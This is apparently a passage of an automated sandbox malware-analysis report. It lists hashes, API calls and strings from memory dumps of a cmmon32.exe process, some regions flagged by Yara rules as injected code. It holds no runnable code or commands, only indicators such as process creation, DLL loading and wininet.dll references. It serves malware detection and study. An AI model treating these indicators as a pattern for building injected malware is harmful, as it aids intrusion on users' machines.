                                                          • Opcode Fuzzy Hash: d14df695a4ca0545634c1e0f05c60b0d5cd1182a3bdfd9dcc889a8ef0a3bc10c
                                                          • Instruction Fuzzy Hash: A6900265211C0042F20075684D14B0700068BD0707F55C125A0155558CC955D9615531
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 72621a0392e3b77ac7d428b8d1c50a76d6d998bb5c0ad0776bc551af4439a0b0
                                                          • Instruction ID: c74035c3d4773385f187194a1aaaf79254ce9e583abc4525d6ef431fe909039e
                                                          • Opcode Fuzzy Hash: 72621a0392e3b77ac7d428b8d1c50a76d6d998bb5c0ad0776bc551af4439a0b0
                                                          • Instruction Fuzzy Hash: E79002A534140442F10071584514B060006CBE1705F55C025E1065558DC659DD526136
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e3d26702903301adddcba5fd48c5a74837b46c386739842c0afab8293175ba0d
                                                          • Instruction ID: b404d9d371bec9a6521cd542f6f8f22ada8f9d03de379d23b397c776167f1db6
                                                          • Opcode Fuzzy Hash: e3d26702903301adddcba5fd48c5a74837b46c386739842c0afab8293175ba0d
                                                          • Instruction Fuzzy Hash: 5390047D311400033105F55C07045070047CFD5755355C031F1017554CD771DD715131
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: af5efb56e4cb7db450b493ec28e1757f3b13a2f48146e06d05bfd83eed98761b
                                                          • Instruction ID: 6aed2ca745519dafe062b53e6e251c8c987358d8d29e4ef72366d719e65ecdc9
                                                          • Opcode Fuzzy Hash: af5efb56e4cb7db450b493ec28e1757f3b13a2f48146e06d05bfd83eed98761b
                                                          • Instruction Fuzzy Hash: 1E90027520544842F14071584504A4600168BD0709F55C021A0065698DD665DE55B671
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cdd9f416e8f724003841979f6b1c4c208d66e18121f9e01de90d618872115f93
                                                          • Instruction ID: de37929e4002873ff7d5a8ded0d98fbe4e648c5b1db844c1305608b5b1cf057f
                                                          • Opcode Fuzzy Hash: cdd9f416e8f724003841979f6b1c4c208d66e18121f9e01de90d618872115f93
                                                          • Instruction Fuzzy Hash: FB90027520140802F1807158450464A00068BD1705F95C025A0026658DCA55DB5977B1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46e3ad2ecd87af3389427cced1ca01766b2abe9d11b8133ce8d666e8ec04a32c
                                                          • Instruction ID: e14c165f568f1d3fc59ed922a233ea4759dc2a86a29c20bbca6585710b814627
                                                          • Opcode Fuzzy Hash: 46e3ad2ecd87af3389427cced1ca01766b2abe9d11b8133ce8d666e8ec04a32c
                                                          • Instruction Fuzzy Hash: 959002A520240003610571584514616400B8BE0605B55C031E1015594DC565D9916135
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 11283085a26de73d7da4128e0896d153d262d0955ba8bfee0e01aacd5461fa71
                                                          • Instruction ID: 5cd824c81accc05b5519f7ceaaf25114a7dfdfa724575f39484c6cebe58a00e9
                                                          • Opcode Fuzzy Hash: 11283085a26de73d7da4128e0896d153d262d0955ba8bfee0e01aacd5461fa71
                                                          • Instruction Fuzzy Hash: F990027560550402F1007158461470610068BD0605F65C421A042556CDC7D5DA5165B2

                                                          Control-flow Graph: function blocks 2ca9070-2ca9192 (rendered graph not reproduced)
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02CA9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                          • Instruction ID: b73a361c0c32b16553978379e23d2139043f06a8f2ab57c89f38a0c10b1647db
                                                          • Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                          • Instruction Fuzzy Hash: DF31C1B2940745BBC724DF64CC99FA7B7B9BB88B04F10851DF62A5B244D730A610CBA4

                                                          Control-flow Graph: function blocks 2ca9067-2ca9192 (rendered graph not reproduced)
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02CA9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: c277475f4c6df1e13ba2662b4c6efc1687009c60f37c66c54771d9c627c70cf4
                                                          • Instruction ID: ffa1ac76c00cca40c3a626852b2fa3bbfb2da17d9f2d8ff91256eb390dd07f78
                                                          • Opcode Fuzzy Hash: c277475f4c6df1e13ba2662b4c6efc1687009c60f37c66c54771d9c627c70cf4
                                                          • Instruction Fuzzy Hash: B031D2B2A40346BBC714DF64CC9AFA7B7B4AB88708F10802DE6299B245D770A550CBA4

                                                          Control-flow Graph: single block 2caa660-2caa691 (rendered graph not reproduced)
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C93AF8), ref: 02CAA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 1d10ea5f46e1cd9fcdd7dd10a426a0357055ea7487d25ee4f5c489c7be66b54c
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 41E012B2200209ABDB18EF99CC48EA777ADAF88754F018558BA1C5B241C631E910CAB0

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C9836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C9838B
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 57b7eea0f59536da0e637285a7ad7642ed3c4b69922504b76f1cacf9458e19ee
                                                          • Instruction ID: df90e8f34a5a7e4b8950ce0b65258f61e374fdc951872b1689159747f0a65be0
                                                          • Opcode Fuzzy Hash: 57b7eea0f59536da0e637285a7ad7642ed3c4b69922504b76f1cacf9458e19ee
                                                          • Instruction Fuzzy Hash: 1201DD31A802197BEB20A6948C02FFF776D6F41B54F144119FF04BB1C1D7A46A054BF5

                                                          Control-flow Graph: function blocks 2c98310-2c98392 (rendered graph not reproduced)
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C9836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C9838B
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction ID: 019123e20ccd87f7d5c491a181bbed2e04602a47ea49ca5c1c1a9f937d0297b9
                                                          • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction Fuzzy Hash: AE01A231A8022977EB20A6949C06FBE776D6B41F54F140259FF04BB1C1E6A4AA064AF6
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C9AD52
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: f19f1478740ae848c21815405bc7e461237aa72ef58682041db4a123a626d494
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: 37015EB6D4020EABDF10EAE4DC45FDDB7789B54308F004195E90997240FA30EB04CB91
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CAA724
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 9b17c3caf47f0b2d3f1ea9c2e8431204d3731970021334b4937623a45c5b5e40
                                                          • Instruction ID: 3de07ef434d9d1224999f7e24d83f5ae8f159d7e2c0717fbeff8ec3633750e19
                                                          • Opcode Fuzzy Hash: 9b17c3caf47f0b2d3f1ea9c2e8431204d3731970021334b4937623a45c5b5e40
                                                          • Instruction Fuzzy Hash: 4001EFB2210108AFCB58CF88DC90EEB37ADAF8C354F118208FA0D97240C630E841CBA0
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CAA724
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 3a9beb3fe225e62a853b17ce798dbfeb69c4d879d5ab56100dff236bd6f2abeb
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: 9B01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02C9F040,?,?,00000000), ref: 02CA91DC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                                          • Instruction ID: ac7bb321c891e9a584179d580c05d8c8c7b8f522a43cc2652aca10034ca694cf
                                                          • Opcode Fuzzy Hash: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                                          • Instruction Fuzzy Hash: 09E092333903143AE3306599EC02FA7B39DCB81B24F14002AFB0DEB2C0D5A6F50146A4
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C9F1C2,02C9F1C2,?,00000000,?,?), ref: 02CAA7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 2c43ef0d90ee0710a0c26dba97b15eb05575ff5be2cfcea22de70c7112e336c1
                                                          • Instruction ID: 4223d859b47833e9fda4e4b568ba2a0fa88b7031b3bcca20d506e2eb9611a051
                                                          • Opcode Fuzzy Hash: 2c43ef0d90ee0710a0c26dba97b15eb05575ff5be2cfcea22de70c7112e336c1
                                                          • Instruction Fuzzy Hash: 0EE0EDB6200205AFDB20DF98CC80ED777AD9F89240F108254FA0C9B201D931E8108BF0
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(02CA4526,?,02CA4C9F,02CA4C9F,?,02CA4526,?,?,?,?,?,00000000,00000000,?), ref: 02CAA64D
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: e4e83f468cbdaf11fe9506299e8de1e7d4f86e04e39a42f99715ef7239d9fe17
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 30E012B2200208ABDB18EF99CC40EA777ADAF88654F118558BA1C5B241C631F910CAB0
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C9F1C2,02C9F1C2,?,00000000,?,?), ref: 02CAA7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: e91c5d078946212342c912d3d2f84effa7412da1a2f36563dcbb464b25b80366
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: D4E01AB12002086BDB14DF49CC84EE737ADAF88654F018154BA0C57241C931E8108BF5
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,02C98D14,?), ref: 02C9F6EB
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: aa0f76243faf6908f4d8fc8ff513ac5e9a7c89ee674470b3e7ce3c4df52cae0e
                                                          • Instruction ID: f2a69f37ef7e18d6fe15a38c1e8ff356170385a5f2090559949989c6dec751d7
                                                          • Opcode Fuzzy Hash: aa0f76243faf6908f4d8fc8ff513ac5e9a7c89ee674470b3e7ce3c4df52cae0e
                                                          • Instruction Fuzzy Hash: 55E0C2E11683812AFB10FBB49C06B476B440B06328F4A04A8954CEF0C7C54891149636
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,02C98D14,?), ref: 02C9F6EB
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction ID: d8caa9a96a87cdca77911945337594e645205ecf5a30ef234d1347cd98491ac1
                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction Fuzzy Hash: ADD0A7727503043BEA10FAA49C07F2773CD5B44B04F490074F948D73C3DA54F1004565
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 53fe94e9e24568b820cfbfcafedd1a2b4f8ddaaddf41d56bd69eedf14e6d72c2
                                                          • Instruction ID: 7b8a5b865166ac48034f65e6b780764f1b1dfb8c5bb3088d204e5ac90d94c173
                                                          • Opcode Fuzzy Hash: 53fe94e9e24568b820cfbfcafedd1a2b4f8ddaaddf41d56bd69eedf14e6d72c2
                                                          • Instruction Fuzzy Hash: D1B09B759015C5C5FF11F760570871779016BD0B05F15C071D2030645F4778E1D1E1B5
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00337156,00331000), ref: 00337027
                                                          • UnhandledExceptionFilter.KERNEL32(Vq3,?,00337156,00331000), ref: 00337030
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,00337156,00331000), ref: 0033703B
                                                          • TerminateProcess.KERNEL32(00000000,?,00337156,00331000), ref: 00337042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID: Vq3
                                                          • API String ID: 3231755760-512008881
                                                          • Opcode ID: 057d9876da3629ca2a39f8f738088cb184a5ec67a7e271f0d1b2b68bd8ac4729
                                                          • Instruction ID: 22c5d7fae0abab770f778bca47b00239d2ca5b193da38cbe7c7b573d8194031c
                                                          • Opcode Fuzzy Hash: 057d9876da3629ca2a39f8f738088cb184a5ec67a7e271f0d1b2b68bd8ac4729
                                                          • Instruction Fuzzy Hash: 75D0C932004604EBDB062BF1FD8CB893F2DEB88322F044002F71A82020CAB244018B61
                                                          APIs
                                                          • ??0CmLogFile@@QAE@XZ.CMUTIL ref: 00333B1F
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL ref: 00333BE0
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL(00000000,00000000,00000000,00000000,00000000), ref: 00333BF1
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL(00000000,00000000,00000000,00000000,00000000), ref: 00333C02
                                                          • GetTickCount.KERNEL32 ref: 00333C29
                                                          • ?GetPrimaryRegPath@CIniW@@QBEPBGXZ.CMUTIL(?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CE6
                                                          • CmStrCpyAllocW.CMUTIL(00000000,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CED
                                                          • lstrlenW.KERNEL32(?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CFD
                                                          • lstrlenW.KERNEL32(00331408,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D09
                                                          • CmMalloc.CMUTIL(?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D18
                                                          • ?SetPrimaryRegPath@CIniW@@QAEXPBG@Z.CMUTIL(00000000,?,?,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D55
                                                          • CmFree.CMUTIL(00000000,?,?,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D5C
                                                          • ?Init@CmLogFile@@QAEJPAUHINSTANCE__@@HPBG@Z.CMUTIL(00331408,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D74
                                                          • ?GPPB@CIniW@@QBEHPBG0H@Z.CMUTIL(Connection Manager,EnableLogging,00000001,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D8C
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Logging,MaxFileSize,00000064,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DA6
                                                          • ?GPPS@CIniW@@QBEPAGPBG00@Z.CMUTIL(Logging,FileDirectory,%Temp%,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DC3
                                                          • ?SetParams@CmLogFile@@QAEJHKPBG@Z.CMUTIL(00000000,00000000,00000000,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DD1
                                                          • ?Start@CmLogFile@@QAEJH@Z.CMUTIL(00000000), ref: 00333DE1
                                                          • ?Stop@CmLogFile@@QAEJXZ.CMUTIL ref: 00333DE9
                                                          • CmFree.CMUTIL(?), ref: 00333DF2
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Connection Manager,IdleTimeout,0000000A), ref: 00333E0C
                                                          • ?SetPrimaryRegPath@CIniW@@QAEXPBG@Z.CMUTIL(?), ref: 00333E1F
                                                          • CmFree.CMUTIL(?), ref: 00333E26
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Connection Manager,IdleThreshold,00000000,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333EFB
                                                          • memset.MSVCRT ref: 00333F26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: File@@$E__@@$FreeG111@Path@Primary$lstrlen$AllocCountG00@Init@MallocParams@Start@Stop@Tickmemset
                                                          • String ID: %Temp%$%s%s$CCmConnection::CCmConnection set m_fGlobalGlobal to %d$CConnStatistics::OpenByStatisticsApi() hTunnel is 0x%x and hDial is 0x%x$Connection Manager$EnableLogging$FileDirectory$IdleThreshold$IdleTimeout$Logging$MaxFileSize$Process 0x%x added to watch list$SOFTWARE\Microsoft\Connection Manager\SingleUserInfo\$SOFTWARE\Microsoft\Connection Manager\UserInfo\$Storing dial-up handle 0x%x$Storing tunnel handle 0x%x
                                                          • API String ID: 2997560287-1460102517
                                                          • Opcode ID: 8b02a15480f7a540bf1df8a3913bf04ee24aaaf4487d987743870ff8ca339e02
                                                          • Instruction ID: 117e0078a6bef2e0dbb1e1f62c4402ca338d82181eddbeec8cdf929a142932da
